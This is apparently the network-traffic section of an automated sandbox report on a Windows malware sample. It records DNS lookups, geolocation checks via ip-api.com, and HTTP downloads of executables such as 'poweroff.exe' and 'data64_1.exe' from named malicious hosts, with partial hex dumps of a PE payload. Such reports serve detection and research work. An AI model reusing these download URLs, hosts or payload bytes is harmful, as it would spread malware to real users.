                                                                                                                          May 21, 2022 09:30:50.424741983 CEST8.8.8.8192.168.2.40xf41No error (0)v.xyzgamev.com172.67.188.70A (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:30:50.424741983 CEST8.8.8.8192.168.2.40xf41No error (0)v.xyzgamev.com104.21.40.196A (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:30:56.195359945 CEST8.8.8.8192.168.2.40xeeb6No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:30:56.728522062 CEST8.8.8.8192.168.2.40x6611Name error (3)ihugas.comnonenoneA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:30:56.796691895 CEST8.8.8.8192.168.2.40x8656Name error (3)ihugas.comnonenoneA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:02.430766106 CEST8.8.8.8192.168.2.40x53a9No error (0)v.xyzgamev.com104.21.40.196A (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:02.430766106 CEST8.8.8.8192.168.2.40x53a9No error (0)v.xyzgamev.com172.67.188.70A (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:04.812433958 CEST8.8.8.8192.168.2.40xa50No error (0)cristaline.s3.pl-waw.scw.clouds3.pl-waw.scw.cloudCNAME (Canonical name)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:04.812433958 CEST8.8.8.8192.168.2.40xa50No error (0)s3.pl-waw.scw.cloud151.115.10.1A (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:07.383193970 CEST8.8.8.8192.168.2.40x9264No error (0)blackhk1.beget.tech5.101.153.227A (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:08.021091938 CEST8.8.8.8192.168.2.40x356bNo error (0)incricinfo.com103.147.182.42A (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:09.460917950 CEST8.8.8.8192.168.2.40xc3e9No error (0)incricinfo.com103.147.182.42A (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:10.348727942 CEST8.8.8.8192.168.2.40x17d6No error (0)incricinfo.com103.147.182.42A (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:11.839039087 CEST8.8.8.8192.168.2.40xd422No error (0)incricinfo.com103.147.182.42A (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:12.928256035 CEST8.8.8.8192.168.2.40x3677No error (0)incricinfo.com103.147.182.42A (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:14.073185921 CEST8.8.8.8192.168.2.40x41a9No error (0)incricinfo.com103.147.182.42A (IP address)IN (0x0001)

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • v.xyzgamev.com
                                                                                                                          • iplogger.org
                                                                                                                          • connectini.net
                                                                                                                          • yuuichirou-hanma.s3.pl-waw.scw.cloud
                                                                                                                          • doja-cat.s3.pl-waw.scw.cloud
                                                                                                                          • ip-api.com
                                                                                                                          • cristaline.s3.pl-waw.scw.cloud

                                                                                                                          HTTP Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          0192.168.2.449758172.67.188.70443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          1192.168.2.449764104.21.40.196443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          10192.168.2.44981337.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          11192.168.2.449812151.115.10.1443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          12192.168.2.44981537.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          13192.168.2.44981737.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          14192.168.2.449821148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          15192.168.2.44982537.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          16192.168.2.44983237.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          17192.168.2.449833148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          18192.168.2.449837148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          19192.168.2.449842148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          2192.168.2.449787148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          20192.168.2.44984337.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          21192.168.2.44984637.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          22192.168.2.44984937.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          23192.168.2.449853148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          24192.168.2.449864104.21.40.196443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          25192.168.2.449866148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          26192.168.2.449868151.115.10.1443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          27192.168.2.449871104.21.40.196443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          28192.168.2.44987237.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          29192.168.2.44987337.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          3192.168.2.44979137.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          30192.168.2.449874148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          31192.168.2.449880148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          32192.168.2.449883148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          33192.168.2.449946148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          34192.168.2.449761208.95.112.180C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          May 21, 2022 09:30:56.301573038 CEST1546OUTGET /json/ HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
                                                                                                                          Host: ip-api.com
                                                                                                                          May 21, 2022 09:30:56.339003086 CEST1599INHTTP/1.1 200 OK
                                                                                                                          Date: Sat, 21 May 2022 07:30:55 GMT
                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                          Content-Length: 287
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Ttl: 60
                                                                                                                          X-Rl: 44
                                                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 48 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 22 38 30 39 30 22 2c 22 6c 61 74 22 3a 34 37 2e 33 36 38 32 2c 22 6c 6f 6e 22 3a 38 2e 35 36 37 31 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 35 32 2e 31 39 22 7d
                                                                                                                          Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8090","lat":47.3682,"lon":8.5671,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"Datacamp Limited","as":"AS212238 Datacamp Limited","query":"84.17.52.19"}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          35192.168.2.449765151.115.10.180
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          May 21, 2022 09:31:05.106575012 CEST1803OUTHEAD /adv-matrix/poweroff.exe HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: InnoDownloadPlugin/1.5
                                                                                                                          Host: cristaline.s3.pl-waw.scw.cloud
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          May 21, 2022 09:31:05.258289099 CEST1803INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 377856
                                                                                                                          x-amz-id-2: tx0fd676efb89442b1a703e-0062889539
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Last-Modified: Mon, 09 May 2022 13:59:42 GMT
                                                                                                                          ETag: "05ccfcafe888dd83e0969080e8897aec"
                                                                                                                          x-amz-request-id: tx0fd676efb89442b1a703e-0062889539
                                                                                                                          x-amz-version-id: 1652104782007633
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Date: Sat, 21 May 2022 07:31:05 GMT
                                                                                                                          May 21, 2022 09:31:05.322495937 CEST1804OUTGET /adv-matrix/poweroff.exe HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: InnoDownloadPlugin/1.5
                                                                                                                          Host: cristaline.s3.pl-waw.scw.cloud
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          May 21, 2022 09:31:05.541373014 CEST1805INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 377856
                                                                                                                          x-amz-id-2: tx23f6551a6e14474e93a84-0062889539
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Last-Modified: Mon, 09 May 2022 13:59:42 GMT
                                                                                                                          ETag: "05ccfcafe888dd83e0969080e8897aec"
                                                                                                                          x-amz-request-id: tx23f6551a6e14474e93a84-0062889539
                                                                                                                          x-amz-version-id: 1652104782007633
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Date: Sat, 21 May 2022 07:31:05 GMT
                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 36 c6 fc f2 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 74 05 00 00 4c 00 00 00 00 00 00 de 92 05 00 00 20 00 00 00 a0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 90 92 05 00 4b 00 00 00 00 c0 05 00 ec 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 06 00 0c 00 00 00 4a 92 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 72 05 00 00 20 00 00 00 74 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 f8 02 00 00 00 a0 05 00 00 04 00 00 00 78 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ec 45 00 00 00 c0 05 00 00 46 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 06 00 00 02 00 00 00 c2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL6.tL @ @@KE J H.textr t `.sdatax@.rsrcEF|@@.reloc @B
                                                                                                                          May 21, 2022 09:31:05.541404963 CEST1806INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 92 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 52 01 00 aa b5 00 00 01 00 00 00
                                                                                                                          Data Ascii: HRRr0+(!BIA&-((:j& 9<&( :+&( :&(8*
                                                                                                                          May 21, 2022 09:31:05.541428089 CEST1808INData Raw: 00 00 0a 28 0f 00 00 06 20 0b 00 00 00 16 39 8d 02 00 00 26 02 7b 06 00 00 04 17 28 11 00 00 06 20 0a 00 00 00 17 3a 75 02 00 00 26 02 7b 03 00 00 04 06 20 46 00 00 00 28 12 00 00 06 28 16 00 00 06 28 17 00 00 06 20 0d 00 00 00 38 4f 02 00 00 02
                                                                                                                          Data Ascii: ( 9&{( :u&{ F((( 8O{ (( 80s} 8{ vs( /(:&{ s( "8{s( 9&
                                                                                                                          May 21, 2022 09:31:05.541450024 CEST1809INData Raw: 00 00 42 2b 09 28 9c 30 7d 43 14 16 9a 26 16 2d f9 17 2a 00 00 00 42 2b 09 28 00 16 63 4d 14 16 9a 26 16 2d f9 16 2a 00 00 00 62 2b 09 28 cb 4e 6a 37 14 16 9a 26 16 2d f9 fe 09 00 00 6f 1a 00 00 0a 2a 00 00 00 72 2b 09 28 00 35 15 51 14 16 9a 26
                                                                                                                          Data Ascii: B+(0}C&-*B+(cM&-*b+(Nj7&-o*r+(5Q&-(*f+([ii&-(*b+(vT&-(*r+(?&-o*r+(d\WA&-o*r+(k~T&-
                                                                                                                          May 21, 2022 09:31:05.541475058 CEST1811INData Raw: 28 33 00 00 06 20 2e 00 00 00 38 3a 05 00 00 02 7b 0a 00 00 04 20 64 00 00 00 28 36 00 00 06 28 37 00 00 06 20 31 00 00 00 28 2d 00 00 06 3a 16 05 00 00 26 02 7b 09 00 00 04 17 28 35 00 00 06 20 0f 00 00 00 28 2d 00 00 06 3a fa 04 00 00 26 02 7b
                                                                                                                          Data Ascii: (3 .8:{ d(6(7 1(-:&{(5 (-:&{s(4 8{(9 8(2 8(A{(B 8{ (6(7 $8{s(C (8b(G :
                                                                                                                          May 21, 2022 09:31:05.541501045 CEST1812INData Raw: ff ff 20 23 00 00 00 fe 0e 01 00 fe 0c 01 00 45 3b 00 00 00 8e fe ff ff 6b 00 00 00 f5 fc ff ff 96 f9 ff ff d6 fc ff ff 7c 00 00 00 ef 00 00 00 0a 00 00 00 7e fc ff ff 9c fc ff ff 94 fa ff ff 55 00 00 00 cd fe ff ff d5 f9 ff ff 78 fe ff ff ff fb
                                                                                                                          Data Ascii: #E;k|~UxYu$Z?Mc4:%ZeI-OJ8
                                                                                                                          May 21, 2022 09:31:05.541518927 CEST1813INData Raw: 09 01 00 28 32 00 00 0a 2a 00 00 00 62 2b 09 28 63 0a 01 5b 14 16 9a 26 16 2d f9 fe 09 00 00 28 33 00 00 0a 2a 00 00 00 ee 2b 09 28 b3 1b 6c 4d 14 16 9a 26 16 2d f9 28 4a 00 00 06 7e 0e 00 00 04 25 3a 17 00 00 00 26 7e 0d 00 00 04 fe 06 52 00 00
                                                                                                                          Data Ascii: (2*b+(c[&-(3*+(lM&-(J~%:&~Rs7%(K*j+(4_&-(N(O*V+(ER`&-(8*r+(S:&-o9*B+(y7N&-*B+(D&-*V+(!~.&-(
                                                                                                                          May 21, 2022 09:31:05.541536093 CEST1815INData Raw: ff ff b2 fc ff ff 2f fd ff ff 5a ff ff ff d6 fd ff ff 4d ff ff ff eb fd ff ff d6 fe ff ff 22 ff ff ff c3 fd ff ff ab fe ff ff b7 fd ff ff 32 ff ff ff 32 ff ff ff 03 ff ff ff 51 fe ff ff e2 fe ff ff 69 fd ff ff 1d fd ff ff a2 fc ff ff 61 fe ff ff
                                                                                                                          Data Ascii: /ZM"22Qia|J 8m(u&*AE0+(aW&-%( (s(~I( 8=
                                                                                                                          May 21, 2022 09:31:05.541553020 CEST1816INData Raw: 17 3a 34 00 00 00 26 28 a7 00 00 06 28 a8 00 00 06 20 7c 02 00 00 28 73 00 00 06 28 9f 00 00 06 0c 08 28 84 00 00 06 0d 38 2a 00 00 00 20 04 00 00 00 fe 0e 04 00 fe 0c 04 00 45 06 00 00 00 b0 ff ff ff b0 ff ff ff 00 00 00 00 92 ff ff ff 12 00 00
                                                                                                                          Data Ascii: :4&(( |(s((8* EK8& 9&(( (s({9(r(q9& 8(M:)o*0+(4(S=&-
                                                                                                                          May 21, 2022 09:31:05.541572094 CEST1817INData Raw: 01 00 06 20 7c 02 00 00 28 8e 02 00 06 28 40 00 00 0a 0d 08 09 28 51 00 00 0a 13 04 07 6f 33 02 00 06 6f 52 00 00 0a 20 2a 05 00 00 28 8e 02 00 06 6f 3d 00 00 0a 39 3a 00 00 00 28 27 01 00 06 09 28 51 00 00 0a 13 04 20 36 05 00 00 28 8e 02 00 06
                                                                                                                          Data Ascii: |((@(Qo3oR *(o=9:('(Q 6((o/(#&(&8o3oR H(o=9+ R(oS: f((8wo3oR (o=99 z((Q
                                                                                                                          May 21, 2022 09:31:05.578327894 CEST1819INData Raw: 3e 00 00 0a 2a 00 00 00 72 2b 09 28 52 88 07 56 14 16 9a 26 16 2d f9 fe 09 00 00 fe 09 01 00 6f 53 00 00 0a 2a 00 00 00 62 2b 09 28 c9 29 45 5b 14 16 9a 26 16 2d f9 fe 09 00 00 6f 5c 00 00 0a 2a 00 00 00 72 2b 09 28 8d ac 4c 33 14 16 9a 26 16 2d
                                                                                                                          Data Ascii: >*r+(RV&-oS*b+()E[&-o\*r+(L3&-o]*v+(o:&-(^*f+(T;7&-(*+(3l&-o_*f+(Ab&-(`*v+(+EI&-


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          36192.168.2.4497665.101.153.22780
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          May 21, 2022 09:31:07.491874933 CEST2201OUTGET
                                                                                                                          Data Raw:
                                                                                                                          Data Ascii:
                                                                                                                          May 21, 2022 09:31:07.559165001 CEST2201OUTData Raw: 2f 73 65 72 76 65 72 2e 74 78 74 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 62 6c 61 63 6b 68 6b 31 2e 62 65 67 65 74 2e 74 65 63 68 0d 0a 2a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 2a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d
                                                                                                                          Data Ascii: /server.txt HTTP/1.0Host: blackhk1.beget.tech*Accept: */**Connection: closeUser-Agent: Firefox-3.0
                                                                                                                          May 21, 2022 09:31:07.626313925 CEST2202INHTTP/1.1 200 OK
                                                                                                                          Server: nginx-reuseport/1.21.1
                                                                                                                          Date: Sat, 21 May 2022 07:31:07 GMT
                                                                                                                          Content-Type: text/plain
                                                                                                                          Content-Length: 14
                                                                                                                          Last-Modified: Mon, 16 May 2022 17:23:48 GMT
                                                                                                                          Connection: close
                                                                                                                          ETag: "628288a4-e"
                                                                                                                          Expires: Sat, 28 May 2022 07:31:07 GMT
                                                                                                                          Cache-Control: max-age=604800
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Data Raw: 69 6e 63 72 69 63 69 6e 66 6f 2e 63 6f 6d
                                                                                                                          Data Ascii: incricinfo.com


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          37192.168.2.449767103.147.182.4280
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          May 21, 2022 09:31:08.282486916 CEST2202OUTGET
                                                                                                                          Data Raw:
                                                                                                                          Data Ascii:
                                                                                                                          May 21, 2022 09:31:08.477375031 CEST2203OUTData Raw: 2f 32 2f 64 61 74 61 36 34 5f 31 2e 65 78 65 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 69 6e 63 72 69 63 69 6e 66 6f 2e 63 6f 6d 0d 0a 2a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 2a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                          Data Ascii: /2/data64_1.exe HTTP/1.0Host: incricinfo.com*Accept: */**Connection: closeUser-Agent: Firefox-3.0
                                                                                                                          May 21, 2022 09:31:08.673968077 CEST2204INHTTP/1.1 200 OK
                                                                                                                          Date: Sat, 21 May 2022 07:31:07 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 1409
                                                                                                                          Connection: close
                                                                                                                          Server: imunify360-webshield/1.18
                                                                                                                          Last-Modified: Saturday, 21-May-2022 07:31:07 GMT
                                                                                                                          Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
                                                                                                                          cf-edge-cache: no-cache
                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 